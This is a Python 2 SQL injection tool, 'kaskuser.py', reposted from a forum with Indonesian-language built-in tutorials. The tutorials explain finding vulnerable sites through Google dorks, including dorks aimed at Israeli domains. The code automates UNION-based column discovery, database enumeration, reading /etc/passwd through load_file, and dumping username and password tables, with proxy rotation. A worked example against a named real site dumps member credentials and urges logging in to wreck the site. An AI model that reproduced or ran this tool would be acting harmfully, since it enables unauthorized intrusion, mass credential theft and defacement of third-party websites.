dari http://www.kaskus.us/showthread.php?t=4583788 mungkin bisa sedikit di review
#!/usr/bin/python
#created by : morgan byte
#kode yg di gunakan
import urllib
import sys
import re
import os
import socket
import httplib
import urllib2
import time
import random
#jenis platform yang cocok di gunakan
if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin':
SysCls = 'clear'
elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos':
SysCls = 'cls'
else:
SysCls = 'unknown'
#halaman paling depan
os.system(SysCls)
if len(sys.argv) <= 1:
print "\nXoooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooX"
print "o o"
print "o ^ Kaskuser ^ o"
print "o o"
print "| Hacking bukan kejahatan |"
print "| |"
print "| Tapi |"
print "| |"
print "| Hacking adalah seni dan pekerjaan programmer |"
print "o o"
print "o created by : morgan byte o"
print "o o"
print "|-----------------------[[[[^^]]]]------------------------------|"
print ") ("
print ") Daftar isi : ("
print ") ("
print ") ("
print ") # Keterangan kaskuser code : ("
print ") /. ketik : kaskuser.py -k lalu tekan enter ("
print ") ("
print ") # Cara Menggunakan : ("
print ") /. ketik : kaskuser.py -m lalu tekan enter ("
print ") ("
print ") # Cara mencari target : ("
print ") /. ketik : kaskuser.py -t lalu tekan enter ("
print ") ("
print ") ("
print ") ("
print ") ("
print ") ___________ ______ _ __ ("
print ") _/ ___\_ __ \_/ __ \ \/ \/ / ("
print ") \ \___| | \/\ ___/\ / ("
print ") \___ >__| \___ >\/\_/ ("
print ") \/ \/ ("
print ") ("
print ") ("
print ")-------------------------$$$$()$$$$----------------------------("
print "% NB : %"
print "% %"
print "% Code kaskuser mencuri database %"
print "% %"
print "X!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!X\n"
sys.exit(1)
#halaman tutorial kaskuser
for arg in sys.argv:
if arg == "-m":
print " Tutorial kaskuser.py "
print "\n\tpenjelasannya:"
print "\tgimana caranya nih gan? . pertama ente hafalin dulu kode yang tadi ( kaskuser.py -k ), penggunaannya untuk apa aja . oke . kalau udah di hafal , mari lihat prakteknya"
print "\n\tpertama:"
print "\tpertama cari dulu target , cara mencari target lihat di kaskuser.py -t , cara nya kasih tanda petik ' di belakang situs . contoh : www.contohsitus.com/berita.php?id=1' . nah kasih tanda petik ' dan enter di mozilla . jika ada bacaan situs itu error maka situs itu bisa di tembus . setelah dapat target baru gunakan script kaskuser.py ini"
print "\n\tkedua:"
print "\tsetelah dapat target maka buka run ketik cmd dan enter , setelah itu tulis cd\ terus enter , tulis cd python25 terus enter , setelah itu baru di mulai eksekusi (inget kode-2 di kaskuser.py) tulis kaskuser.py -u \"www.contohsitus.com/berita.php?id=1\" --findcol . terus enter (mencari panjang kolom). setelah dapat panjang kolom , misalkan www.contohsitus.com/berita.php?id=1+union+select+1,cendol,3,4 . maka berlanjut ke eksekusi selanjutnya"
print "\n\tketiga:"
print "\tsetelah dapet kolom , maka selanjutnya adalah melihat dalam database tersebut , contohnya : kaskuser.py -u \"www.contohsitus.com/berita.php?id=1+union+select+1,cendol,3,4\" --full . maka akan tampil seluruh isi database, kolom dan table nya"
print "\tuntuk melihat hasilnya, buka folder C di komputer kamu , lihat folder python25 , klik dan lihat ada bacaan hasil.txt di notepad . buka itu . hasil dari dalam database table dan kolom akan terlihat, baris pertama itu di namakan table , dan baris kedua di namakan kolom . maka cara eksekusinya seperti ini :"
print "\n\tkeempat:"
print "\tini eksekusi terakhir untuk mengambil seluruh isi situs, baik username, email dan password , login admin situs tersebut . caranya , contoh nama tablenya user dan nama colomnnya email,password dan nama databasenya aril-luna , maka cara eksekusinya : kaskuser.py -u \"www.contohsitus.com/berita.php?id=1+union+select+1,cendol,3,4\" --dump -D aril-luna -T user -C email,password . dan enter. maka otomatis seluruh email dan password situs tersebut akan tampak dan tersimpan di hasil.txt tadi"
print "\n\tkelima:"
print "\tcara atas untuk Mysql version 5 sedangkan Mysql version 4 caranya contoh : kaskuser.py -u \"www.contohsitus.com/berita.php?id=1+union+select+1,cendol,3,4\" --fuzz"
print "\n\tkeenam:"
print "\tselanjutnya tinggal kembangkan kreatifitas ente , contoh kodenya ada di kaskuser.py -k . jangan lupa cendolnya gan hehe :P"
print "\n\tCONTOH:"
print "\n\t "
print "\tme dapet situs amerika www.kcbs.us/results_print.php?id=1899' <<= kasih tanda petik , dan ternyata error , maka me eksekusi di code kaskuser.py"
print "\tbuka run, ketik cmd , ketik cd\ lalu enter . ketik cd python25 lalu enter , ketik kaskuser.py -u \"www.kcbs.us/results_print.php?id=1899\" --findcol (mencari panjang kolom)"
print "\n\t "
print "\tmaka hasilnya akan seperti ini : "
print "\n\t "
print "\t[+] URL:http://www.kcbs.us/results_print.php?id=1899--"
print "\t[+] Pemisahan Memakai: + -- "
print "\t[+] Menentukan Jumlah Kolom ..."
print "\t[+] Panjang Kolom : 4"
print "\t[+] Kolom Yg Null Berada Di Nomor #: 1"
print "\t[+] SQLi URL: http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11--"
print "\tcendol URL: http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,cendol,3,4,5,6,7,8,9,10,11"
print "\t[-] Misi Selesai!"
print "\n\t "
print "\tnah itu berarti panjang kolomnya 4 dan kelemahannya ada di angka 1 , copy paste yg ada bacaan cendol"
print "\tmaka selanjutnya mengetahui isi database situs itu, lihat yg ada bacaan cendol "
print "\tcaranya : ketik : kaskuser.py -u \"http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,cendol,3,4,5,6,7,8,9,10,11\" --full"
print "\n\t "
print "\tmaka hasilnya akan seperti ini : "
print "\n\t "
print "\t[+] URL:http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,cendol,3,4,5,6,7,8,9,10,11--"
print "\t[+] Gathering MySQL Server Configuration..."
print "\tDatabase: kcbs_mma"
print "\tUser: mma@localhost"
print "\tVersion: 5.0.27"
print "\n\t "
print "\t[Database]: kcbs_db"
print "\t[Table: Columns]"
print "\t[47]webmembers: id,memberId,personId,nameuser,wordpass,lastLogin,email,firstname,lastname,city,state,country"
print "\n\t "
print "\tmaka ketemu sudah , nama databasenya kcbs_db , nama Table nya webmembers , dan kolomnya id,memberId,personId,nameuser dll"
print "\n\t "
print "\tTerakhir yaitu mengetahui username , password dan email situs itu"
print "\tcaranya , ketik : kaskuser.py -u \"http://www.kcbs.us/results_print.php?id=1899+AND+1=2+UNION+SELECT+0,1,cendol,3,4,5,6,7,8,9,10,11\" --dump -D kcbs_db -T webmembers -C email,wordpass lalu enter "
print "\n\t "
print "\tlihat apa yg terjadi , kita mendapatkan ribuan username dan password admin serta member situs itu . selanjutnya tinggal login , dan acak-acak situs itu ;) "
print "\twar is begin . target utama israel dan amerika ."
print "\n\t "
print "\tuntuk kembali ke halaman utama , ketik : kaskuser.py lalu enter"
sys.exit(1)
#halaman mencari target
for arg in sys.argv:
if arg == "-t":
print "\n Mencari Target "
print " "
print " "
print " DASAR-DASAR PENCARIAN "
print " "
print " \n"
print "\tPengenalan:"
print "\n "
print " \n"
print "\tTarget di bagi 2 bagian : target khusus dan target umum"
print "\n \n"
print "\tTarget Khusus yaitu dimana kita mengkhususkan pembobolan pada satu situs"
print "\tTarget Umum yaitu bersifat random , hasil dari search engine"
print "\n \n"
print "\tCaranya:"
print "\n "
print " \n"
print "\tketik www.google.com . lalu masukkan url bug seperti ini : inurl:reviews.php?id= , lalu tekan enter , maka semua situs yg berhalaman reviews akan muncul di google, klik satu persatu situs tersebut dan beri tanda petik ' di akhir url nya. contoh : www.situskamu.com/reviews.php?id=23' <<= kasih tanda petik seperti ini. jika error maka situs tersebut bisa di bobol "
print "\tsetelah dapat situs yg error (maksud situs error yaitu halamannya ada bacaan error atau halaman itu rusak) maka langsung eksekusi menggunakan code kaskuser.py lihat caranya di kaskuser.py -m (enter) "
print "\tcontoh bug url banyak sekali , bisa di kreasi sendiri , contoh seperti : inurl:berita.php?id= , inurl:news.php?sid= , inurl: index.php?id= , dan lain-lain"
print "\tjika ingin menembus situs-2 yg khusus satu negara , contoh negara israel , maka url bug nya tambahkan kode negara israel seperti ini : inurl:index.php?id= 'co.il'"
print "\t untuk target khusus , tinggal tambahkan tanda petik ' , dan cari di mana errornya"
print "\tberlaku untuk mysql 5 dan mysql 4 "
print "\n "
print " \n"
print "\n\t "
print "\tuntuk kembali ke halaman utama , ketik : kaskuser.py lalu enter"
sys.exit(1)
#halaman keterangan kode kaskuser
for arg in sys.argv:
if arg == "-k":
print " Penggunaan: ./kaskuser.py "
print "\n "
print " \n"
print "\tWajib Di Ketahui Kode-Kode Berikut ini"
print "\n "
print " \n"
print "\tModel:"
print "\tcontoh: --dbs kode untuk melihat database situs. MySQL v5+"
print "\tcontoh: --schema kode untuk melihat kerangka situs. MySQL v5+"
print "\tcontoh: --masuk kode untuk melihat isi database situs. MySQL v5+"
print "\tcontoh: --dump kode untuk mengambil isi database yg di inginkan. MySQL v4+"
print "\tcontoh: --fuzz kode untuk melihat table dan kolom situs versi 4. MySQL v4+"
print "\tcontoh: --kolom kode untuk mencari panjang kolom situs MySQL v4+"
print "\tcontoh: --info kode untuk melihat informasi situs versi 4. MySQL v4+"
print "\n\tPerintah nya:"
print "\tcontoh: -u URL \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\""
print "\n\tmodel perintah dump dan kerangka:"
print "\tcontoh: -D \"untuk nama database\""
print "\tcontoh: -T \"untuk table\""
print "\tcontoh: -C \"untuk kolom\""
print "\n\tOptional:"
print "\tcontoh: -p \"buat proxy 127.0.0.1:80 or proxy.txt\""
print "\tcontoh: -o \"file yg di masukan.txt\" contoh hasil.txt"
print "\tcontoh: -r baris nomor di mulai"
print "\tcontoh: -v ini buat dump kalau tidak mau pakai nomor."
print "\n Ex: ./kaskuser.py --info -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\""
print " Ex: ./kaskuser.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\""
print " Ex: ./kaskuser.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\" -D catalog -T orders -r 200"
print " Ex: ./kaskuser.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\" -D joomla -T jos_users -C username,password"
print " Ex: ./kaskuser.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,cendol,3,4\" -end \"/*\" -o sitelog.txt"
print " Ex: ./kaskuser.py --kolom -u \"www.site.com/news.php?id=22\""
print "\n\t "
print "\tuntuk kembali ke halaman utama , ketik : kaskuser.py lalu enter"
sys.exit(1)
#panjang kolom
MaxCol = 101
#nama-nama table .
fuzz_tables = ['tbladmins', 'sort', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser', 'art', 'article_admin', 'articles', 'artikel', '\xc3\x83\xc3\x9c\xc3\x82\xc3\xab', 'aut', 'author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'images', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login', 'login_admin', 'login_admins', 'login_user', 'login_users', 'logins', 'logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users', 'member', 'memberlist', 'members', 'minibbtable_users', 'mitglieder', 'movie', 'movies', 'mybb_users', 'mysql', 'mysql.user', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_authors', 'nuke_bbconfig', 'nuke_config', 'nuke_popsettings', 'nuke_users', '\xc3\x93\xc3\x83\xc2\xbb\xc2\xa7', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 
'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members', 'user', 'user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights', 'users', 'vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'ACT_INFO', 'ActiveDataFeed', 'Category', 'CategoryGroup', 'ChicksPass', 'ClickTrack', 'Country', 'CountryCodes1', 'CustomNav', 'DataFeedPerformance1', 'DataFeedPerformance2', 'DataFeedPerformance2_incoming', 'DataFeedShowtag1', 'DataFeedShowtag2', 'DataFeedShowtag2_incoming', 'dtproperties', 'Event', 'Event_backup', 'Event_Category', 'EventRedirect', 'Events_new', 'Genre', 'JamPass', 'MyTicketek', 'MyTicketekArchive', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected', 'Promotion', 'ProxyDataFeedPerformance', 'ProxyDataFeedShowtag', 'ProxyPriceInfo', 'Region', 'SearchOptions', 'Series', 'Sheldonshows', 'StateList', 'States', 'SubCategory', 'Subjects', 'Survey', 'SurveyAnswer', 'SurveyAnswerOpen', 'SurveyQuestion', 'SurveyRespondent', 'sysconstraints', 
'syssegments', 'tblRestrictedPasswords', 'tblRestrictedShows', 'Ticket System Acc Numbers', 'TimeDiff', 'Titles', 'ToPacmail1', 'ToPacmail2', 'Total Members', 'UserPreferences', 'uvw_Category', 'uvw_Pref', 'uvw_Preferences', 'Venue', 'venues', 'VenuesNew', 'X_3945', 'stone list', 'tblArtistCategory', 'tblArtists', 'tblConfigs', 'tblLayouts', 'tblLogBookAuthor', 'tblLogBookEntry', 'tblLogBookImages', 'tblLogBookImport', 'tblLogBookUser', 'tblMails', 'tblNewCategory', 'tblNews', 'tblOrders', 'tblStoneCategory', 'tblStones', 'tblUser', 'tblWishList', 'VIEW1', 'viewLogBookEntry', 'viewStoneArtist', 'vwListAllAvailable', 'CC_info', 'CC_username', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'cc_info', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin', 'Admins', 'Login', 'Logins']
#nama-nama kolom .
fuzz_columns = ['user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber]', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 
'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass']
#penggunaan default nya
arg_end = "--"
arg_eva = "+"
#kode pertama
site = ""
dbt = "hasil.txt"
proxy = "None"
count = 0
arg_table = "None"
arg_database = "None"
arg_columns = "None"
arg_row = "Rows"
arg_verbose = 1
cendol = "concat(0x1e,0x1e,"
mode = "None"
line_URL = ""
count_URL = ""
gets = 0
cur_db = ""
cur_table = ""
table_num = 0
terminal = ""
num = 0
#kode yg di gunakan args
for arg in sys.argv:
if arg == "-u":
site = sys.argv[count+1]
elif arg == "-o":
dbt = sys.argv[count+1]
elif arg == "-p":
proxy = sys.argv[count+1]
elif arg == "--dump":
mode = arg
arg_dump = sys.argv[count]
elif arg == "--masuk":
mode = arg
elif arg == "--schema":
mode = arg
arg_schema = sys.argv[count]
elif arg == "--dbs":
mode = arg
arg_dbs = sys.argv[count]
elif arg == "--fuzz":
mode = arg
arg_fuzz = sys.argv[count]
elif arg == "--info":
mode = arg
arg_info = sys.argv[count]
elif arg == "--kolom":
mode = arg
arg_kolom = sys.argv[count]
elif arg == "-D":
arg_database = sys.argv[count+1]
elif arg == "-T":
arg_table = sys.argv[count+1]
elif arg == "-C":
arg_columns = sys.argv[count+1]
elif arg == "-end":
arg_end = sys.argv[count+1]
if arg_end == "--":
arg_eva = "+"
else:
arg_eva = "/**/"
elif arg == "-r":
num = sys.argv[count+1]
table_num = num
elif arg == "-v":
arg_verbose = sys.argv[count]
arg_verbose = 0
count+=1
#halaman atas ketika eksekusi
file = open(dbt, "a")
print "\n ! BANTAI SITUS ! "
print " "
print " "
print " Nothing Is Secured "
print " "
print " "
print " "
print " Design by : morgan byte "
print " "
print " "
print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
file.write("\n ! BANTAI SITUS ! ")
file.write("\n ")
file.write("\n ")
file.write("\n Nothing Is Secured ")
file.write("\n ")
file.write("\n ")
file.write("\n ")
file.write("\n Design by : morgan byte ")
file.write("\n ")
file.write("\n ")
file.write("\n>>>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print "\n "
print "\n "
print "\n "
print "\n "
#Jika kode Arg Error
if site == "":
print "\n[-] harus pakai kode ini -u dan spesifikasinya"
print "[-] untuk keterangan ketik : kaskuser.py -k\n"
sys.exit(1)
if mode == "None":
print "\n[-] spesifikasi kode yg di gunakan --schema, --dbs, --dump, --fuzz, --info, --masuk, --kolom."
print "[-] untuk keterangan ketik : kaskuser.py -k\n"
sys.exit(1)
if mode == "--schema" and arg_database == "None":
print "[-] harus pakai kode ini -D"
print "[-] untuk keterangan ketik : kaskuser.py -k\n"
sys.exit(1)
if mode == "--dump":
if arg_table == "None" or arg_columns == "None":
print "[-] Versi 5 pakai kode -D, -T dan -C setelah ntu --dump"
print "[-] Versi 4 pakai kode -T dan -C setelah ntu --dump"
print "[-] untuk keterangan ketik : kaskuser.py -k\n"
sys.exit(1)
if mode != "--kolom" and site.find("cendol") == -1:
print "\n[-] SALAH ! , cari dan copy paste yg ada bacaan \'cendol\'\n"
sys.exit(1)
if proxy != "None":
if len(proxy.split(".")) == 2:
proxy = open(proxy, "r").read()
if proxy.endswith("\n"):
proxy = proxy.rstrip("\n")
proxy = proxy.split("\n")
if arg_columns != "None":
arg_columns = arg_columns.split(",")
if site[:7] != "http://":
site = "http://"+site
if site.endswith("/*"):
site = site.rstrip('/*')
if site.endswith("--"):
site = site.rstrip('--')
#Konek ke situs yg di masukkan
site = site.replace("+",arg_eva)
site = site.replace("/**/",arg_eva)
print "\n[+] Target Situs:",site+arg_end
file.write("\n\n[+] URL:"+site+arg_end+"\n")
print " "
file.write("\n ")
#pasang proxy
socket.setdefaulttimeout(20)
proxy_list = []
if proxy != "None":
file.write("\n[+] Building Proxy List...")
print "[+] Building Proxy List..."
for p in proxy:
try:
proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'})
opener = urllib2.build_opener(proxy_handler)
gets+=1
opener.open("http://www.google.com")
proxy_list.append(urllib2.build_opener(proxy_handler))
file.write("\n\tProxy:"+p+"- Success")
print "\tProxy:",p,"- Success"
except:
file.write("\n\tProxy:"+p+"- Failed")
print "\tProxy:",p,"- Failed"
pass
if len(proxy_list) == 0:
print "[-] All proxies have failed. App Exiting"
sys.exit(1)
print "[+] Proxy List Complete"
file.write("\n[+] Proxy List Complete")
else:
print "[-] Tanpa Proxy"
file.write("\n[+] Tanpa Proxy")
proxy_list.append(urllib2.build_opener())
proxy_num = 0
proxy_len = len(proxy_list)
#Mencari Kolom
if mode == "--kolom":
print "[+] Sedang mencari jumlah kolom "
file.write("\n[+] Sedang mencari jumlah kolom ")
print " "
file.write("\n ")
checkfor=[]
sitenew = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva
makepretty = ""
for x in xrange(0,MaxCol):
try:
sys.stdout.write("%s," % (x))
file.write(str(x)+",")
sys.stdout.flush()
cendol = "qutho"+str(x)+"miyah"
checkfor.append(cendol)
if x > 0:
sitenew += ","
sitenew += "0x"+cendol.encode("hex")
finalurl = sitenew+arg_end
gets+=1
proxy_num+=1
source = proxy_list[proxy_num % proxy_len].open(finalurl).read()
for y in checkfor:
colFound = re.findall(y,source)
if len(colFound) >= 1:
print "\n[+] MaxCol :",len(checkfor)
file.write("\n[+] MaxCol : "+str(len(checkfor)))
nullcol = re.findall(("\d+"),y)
print "[+] Kolom Yg Null Berada Di Nomor #:",nullcol[0]
file.write("\n[+] Kolom Yg Null Berada Di Nomor #: "+nullcol[0])
for z in xrange(0,len(checkfor)):
if z > 0:
makepretty += ","
makepretty += str(z)
site = site+arg_eva+"AND"+arg_eva+"1=2"+arg_eva+"UNION"+arg_eva+"SELECT"+arg_eva+makepretty
print "[+] SQLi URL:",site+arg_end
file.write("\n[+] SQLi URL: "+site+arg_end)
site = site.replace(","+nullcol[0]+",",",cendol,")
site = site.replace(arg_eva+nullcol[0]+",",arg_eva+"cendol,")
site = site.replace(","+nullcol[0],",cendol")
print "[+] cendol URL:",site
file.write("\n[+] cendol URL: "+site)
print "[-] Misi Selesai!\n"
file.write("\n[-] Misi Selesai!\n")
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
print "\n "
file.write("\n ")
print "\n "
file.write("\n ")
print "\n[!] GAGAL"
file.write("\n[!] GAGAL")
print "[-] Coba di eksekusi secara manual, copy paste di mozilla"
print "[-] Misi Selesai\n"
sys.exit(1)
#Untuk mengetahui version:user:database situs
head_URL = site.replace("cendol","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end
print "[+] Sedang menembus database"
file.write("\n[+] Sedang menembus database\n")
while 1:
try:
gets+=1
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
# Uncomment the following lines to debug issues with gathering server information
# print head_URL
# print source
match = re.findall("\x1e\x1e\S+",source)
if len(match) >= 1:
match = match[0][2:].split("\x1e")
version = match[0]
user = match[1]
database = match[2]
print "\tDatabase:", database
print "\tUser:", user
print "\tVersion:", version
file.write("\tDatabase: "+database+"\n")
file.write("\tUser: "+user+"\n")
file.write("\tVersion: "+version)
version = version[0]
break
else:
print "[-] No Data Found"
sys.exit(1)
except (KeyboardInterrupt, SystemExit):
raise
except:
proxy_num+=1
# Akses untuk mengetahui MySQL database dan Load_File (file yg di simpan)
if mode == "--info":
head_URL = site.replace("cendol","0x"+"cendol".encode("hex"))+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
gets+=1
proxy_num+=1
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("cendol",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t"
else:
yesno = "No"
print "\n[+] Do we have Access to MySQL Database:",yesno
file.write("\n\n[+] Do we have Access to MySQL Database: "+str(yesno))
if yesno == "Yes <-- w00t w00t":
print "[!]",site.replace("cendol","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end
file.write("\n[!] "+site.replace("cendol","concat(user,0x3a,password)")+arg_eva+"FROM"+arg_eva+"mysql.user"+arg_end)
gets+=1
proxy_num+=1
head_URL = site.replace("cendol","load_file(0x2f6574632f706173737764)")+arg_end
#print "Debug:",head_URL
source = proxy_list[proxy_num % proxy_len].open(head_URL).read()
match = re.findall("root:x:",source)
match = re.findall("root:*:",source)
if len(match) >= 1:
yesno = "Yes <-- w00t w00t"
else:
yesno = "No"
print "\n[+] Do we have Access to Load_File:",yesno
file.write("\n\n[+] Do we have Access to Load_File: "+str(yesno))
if yesno == "Yes <-- w00t w00t":
print "[!]",site.replace("cendol","load_file(0x2f6574632f706173737764)")+arg_end
file.write("\n[!] "+site.replace("cendol","load_file(0x2f6574632f706173737764)")+arg_end)
#Jika situs ternyata versi 4
if mode == "--schema" or mode == "--dbs" or mode == "--masuk":
if int(version) == 4:
print "\n[-] --schema, --dbs and --masuk hanya untuk MySQL v5+ servers!"
print "[-] -k for help"
sys.exit(1)
#Mengeksekusi URL situs
if mode == "--schema":
if arg_database != "None" and arg_table == "None":
print "[+] Showing Tables & Columns from database \""+arg_database+"\""
file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"")
line_URL = site.replace("cendol","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.columns"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(table_schema),0x1e,0x20)")
count_URL += arg_eva+"FROM"+arg_eva+"information_schema.tables"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")+arg_end
arg_row = "Tables"
if arg_database != "None" and arg_table != "None":
print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\""
file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"")
line_URL = site.replace("cendol","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)")
line_URL += arg_eva+"FROM"+arg_eva+"information_schema.COLUMNS"+arg_eva+"WHERE"+arg_eva+"table_schema=0x"+arg_database.encode("hex")
line_URL += arg_eva+"AND"+arg_eva+"table_name+=+0x"+arg_table.encode("hex")
count_URL = site.replace("cendol","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)")
